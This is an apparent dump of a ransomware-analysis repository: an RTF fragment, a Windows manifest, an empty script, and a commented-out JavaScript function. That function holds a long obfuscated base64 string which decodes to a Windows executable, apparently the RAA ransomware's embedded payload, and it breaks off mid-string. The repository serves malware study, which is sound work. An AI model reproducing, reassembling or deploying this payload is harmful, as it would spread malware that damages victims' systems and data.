M+AzrXOk8614omhzqbOtCDilZ/OseKJoc6x4oml4omkwrHiiaXiiaHOsS4NCg==\\cf0\\b\\fs24\\par\r\n\\pard\\cf5\\b0\\fs22 z4PCsOKBvywgzqbCseKJpc614omIz4bOps6pIOKJoc6xzqPOtcKx4omlzqYhIOKVq86xwrHiiaXOtSDOteKIqeKJpMKx4omlzrXCsM6xz4PCsOKBvyDiiaXiiJogzqniiaTDn861zqksIMKx4oml4omhz4PiiJ7CoMKx4oG/IM+GzrHiiKnOtc60z4bOpuKJpeKBvyDPg8+AzrUhIA0K4pWaIOKIqeKJoc6mw5/OtM6mwrXOscKgwrHigb8gzqkg4omlz4PDn8+DLCDCoCDPg+KImc+DIM6jzrXOtMK1z4PPhiDPhs6x4omk4omIzqbiiaXigb6mIM60z4PiiaXPhs6mzpgg4oipzrXOtM6jz4PPhuKBvyEgDQrilabPg+KJpc61IM6TIMKxzrHiiJ7OteKIniDiiaHOscKxw7fOk8+D4omlz4Mgz4PPgM61LCDCsc61IMKx4oml4omkzqPPg8+G4oia4oiezqYgzqbCseKJpc614omIz4bOps6pzrHiiJ7OpiDOpiDDn860zrHPgM61wrHiiaXPhs61zpgg4omlzqbCsM6mz4bOtc6YOiDOtSwg4oip4omhzqbijKHOtc6jzqbiiaXPgywgzqPiiaHiiaTPhOKBv8KgIOKIns61zqYsIOKJiOKJpc61w5/iiJog4omlzqbCsM6mz4bOsSDCseKJpc6xzrTOsSDPg+KImc+DIMOfzrTOscK1z4PPhs+Gz4POmCEgDQrilZrDn861IMKy4omlzrUgw7sgz4bOscKwzrEgzpPiiJrCseKBvyDOpiDPhs6xwrDOsSDiiaHOtc6jzqbPhs6xOiDCsc60zqbCsM6pzrXiiJ4gzpPiiJrCsc61zqnOtSDCtc6mzrTOpuKImc+DIM+GzrHCsM+DIM6mIM+Gz4POo861wrHCoM+AzrHPg+KIns61IM6jzrTCoCDOk8Kxz4PijKEgz4bPgKJpOKJoc+GzrUg4oml4oiaIMOf4oG/z4PCsOKBvywgzqbCseKJpc614omIz4bOps6pIOKJoc6xzqPOtcKx4omlzqYhIOKVq86xwrHiiaXOtSDOteKIqeKJpMKx4omlzrXCsM6xz4PCsOKBvyDiiaXiiJogzqniiaTDn861zqksIMKx4oml4omhz4PiiJ7CoMKx4oG/IM+GzrHiiKnOtc60z4bOpuKJpeKBvyDPg8+AzrUhIA0K4pWaIOKIqeKJoc6mw5/OtM6mwrXOscKgwrHigb8gzqkg4omlz4PDn8+DLCDCoCDPg+KImc+DIM6jzrXOtMK1z4PPhiDPhs6x4omk4omIzqbiiaXigb6mIM60z4PiiaXPhs6mzpgg4oipzrXOtM6jz4PPhuKBvyEgDQrilabPg+KJpc61IM6TIMKxzrHiiJ7OteKIniDiiaHOscKxw7fOk8+D4omlz4Mgz4PPgM61LCDCsc61IMKx4oml4omkzqPPg8D4omhz4biiaTOk8KwzqbPg8KxwqAgzrXiiaUgwrXOpsGzrHOoyDPhs6m4oiezqYsIMKxzrXCsc+DzqPOpiDOteKJoc60zrHiiJ4gzqYgwrHPhs+Dz4DiiaQsIMKxzrXCsc+DzqPOpiDCsc61zrTPhsO34omkOiDiiaXOsc6pIMK1zqbOk+KJpOKJpSDiiJ7Otc+A4omk4omIzqbPgyDOk8+D4oml4omh4oiaLg0K4pWaIOKIqc61zqPOtcOfz4bOtSDOk8+D4oml4omh4omkIMOf4omkzqPiiaQgzqYgwqAgz4bPg86pzrXPgM6jzrEgw5/iiaTCsM+DzpPOseKJpeKBvyDCseKJoc+DzqPOpiDPhs6m4oyhIM6mIM6j4omk4oyhzrXiiJ4gwrHOk861zqbiiJ4gz4TOseKMoc6TzrHiiaXiiJrOk86x4oml4oG/IM6j4oia4oyhzrHPhs6mz4Mg4omkIM6j4omk4oyhzrEgzqbijKE6IOKJpc6xzqkg4oyhzrXiiYjPg\\cf0\\lang1033\\f1\\fs20\\par\r\n}\r\n\u0000\n"
  },
  {
    "path": "raa-ransomware-analysis/extracted/file01_part.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\n    <assemblyIdentity\n            version=\"1.0.0.0\"\n            processorArchitecture=\"X86\"\n            name=\"Netopsystems.nosso\"\n            type=\"win32\"\n    <dependency>\n        <dependentAssembly>\n            <assemblyIdentity\n                    type=\"win32\"\n                    name=\"Microsoft.Windows.Common-Controls\"\n                    version=\"6.0.0.0\"\n                    publicKeyToken=\"6595b64144ccf1df\"\n                    language=\"*\"\n                    processorArchitecture=\"X86\"\n        </dependentAssembly>\n    </dependency>\n    <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n        <security>\n            <requestedPrivileges>\n                <requestedExecutionLevel\n                        level=\"asInvoker\"\n                        uiAccess=\"false\"\n            </requestedPrivileges>\n        </security>\n    </trustInfo>\n</assembly>"
  },
  {
    "path": "raa-ransomware-analysis/work/test.js",
    "content": ""
  },
  {
    "path": "raa-ransomware-analysis/work/tmp.js",
    "content": "// /**\n//  * Created by bl4de on 12.07.2016.\n//  */\n//\n// function NWvQtGjjfQX() {\n//     var data_pn = \"TVrDiQNMSIOPDNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPMKgwqNMSIOPNMSIOPNMSIOPOKVlQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDOsQNMSIOPNMSIOPNMSIOPNMSIOP4f4pWRDgDilKQJ4pWQIeKVlQFM4pWQIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOP4pSkJOKBv+KWgOKJoUXDhsOu4omhRcOGw67iiaFFw4bDruKVq8Oi4oipw67OsUXDhsOu4pWrw6Ligb/Drs6YRcOGw67ilavDosKgw67ilZVFw4bDruKImT0Bw67CskXDhsOu4omhRcO0w648RcOGw67OtRcWw67CsUXDhsOuzrUXBsOuwrFFw4bDrs61FwPDrsKxRcOGw65SaWNo4omhRcOGw64NMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPFBFNMSIOPNMSIOPBMNMSIOPQYNMSIOPw4fOsV1XNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDOsQNMSIOPDNMSIOPQsBCQNMSIOPNMSIOPw6oNMSIOPNMSIOPNMSIOPDDhgENMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPMOFMNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPDDoQNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPgNMSIOPNMSIOPBQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPFNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPBwNMSIOPwNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPINMSIOPNMSIOPMOHNMSIOPNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDDruKVogNMSIOPNMSIOPPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPBgNMSIOPwNMSIOPMCNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPgNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDDieKUggNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPMOhNMSIOPNMSIOPBsNMSIOPgNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPLnRleHQNMSIOPNMSIOPNMSIOPNMSIOPfw6UNMSIOPNMSIOPNMSIOPNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPw6oNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPgNMSIOPNMSIOPBgLnJkYXRhNMSIOPNMSIOPDiiaEjNMSIOPNMSIOPNMSIOPNMSIOPw6ENMSIOPNMSIOPNMSIOPNMSIOPkNMSIOPNMSIOPNMSIOPNMSIOPw64NMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPENMSIOPuZGF0YQNMSIOPNMSIOPNMSIOPMOkGwENMSIOPNMSIOPOKVqNMSIOPNMSIOPNMSIOPNMSIOPNMSIOP4NMSIOPNMSIOPNMSIOPDilpENMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPOKUlC50bHMNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPNMSIOPNMSIOPDiiaEBNMSIOPNMSIOPNMSIOPCNMSIOPNMSIOPNMSIOPNMSIOP4pWbNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPBNMSIOPNMSIOPNMSIOPDilJQucmVsb2MNMSIOPNMSIOPFtTNMSIOPQNMSIOPNMSIOPNMSIOPNMSIOPINMSIOPNMSIOPFQBNMSIOPNMSIOPDilJQNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPOKUlC5yc3JjNMSIOPNMSIOPNMSIOPNMSIOPDNMSIOPgNMSIOPNMSIOPNMSIOPBgNMSIOPwNMSIOPNMSIOPCgNMSIOPNMSIOPNMSIOPBQCNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPENMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMSIOPNMS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